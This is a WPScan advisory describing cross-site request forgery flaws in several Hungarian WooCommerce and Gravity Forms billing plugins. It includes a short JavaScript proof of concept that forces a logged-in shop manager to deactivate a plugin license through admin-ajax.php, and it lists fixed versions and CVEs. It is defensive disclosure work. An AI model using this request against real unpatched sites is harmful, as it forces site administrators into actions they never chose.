WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Multiple Plugins from Viszt Peter - Multiple CSRF

Description

The plugins are lacking CSRF checks in various AJAX actions, which could allow attackers to make logged in Shop Managers and above perform unwanted actions, such as deactivate the plugin's license

Proof of Concept

With the woo-billingo-plus plugin installed, make a logged in user with the edit_shop_orders capability open a page containing the below JS code

fetch('https://example.com/wp-admin/admin-ajax.php', { 
method: 'POST', 
headers: new Headers({ 
'Content-Type': 'application/x-www-form-urlencoded', 
}), 
body: 'action=wc_billingo_plus_license_deactivate', 
redirect: 'follow' 
}).then(response => response.text()).then(result => 
console.log(result)).catch(error => console.log('error', error));

For other plugins, juts change the action parameter accordingly

Affects Plugins

woo-billingo-plus
Fixed in version 4.4.5.4
integration-for-billingo-gravity-forms
Fixed in version 1.0.4
integration-for-szamlazz-hu-gravity-forms
Fixed in version 1.2.7
integration-for-szamlazzhu-woocommerce
Fixed in version 5.6.3.3
hungarian-pickup-points-for-woocommerce
Fixed in version 1.9.0.3

References

CVE
CVE-2022-3154
CVE
CVE-2022-41685

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
cda978b2-b31f-495d-8601-0aaa3e4b45cd

Timeline

Publicly Published

2022-09-14 (about 6 months ago)

Added

2022-09-14 (about 6 months ago)

Last Updated

2022-10-20 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin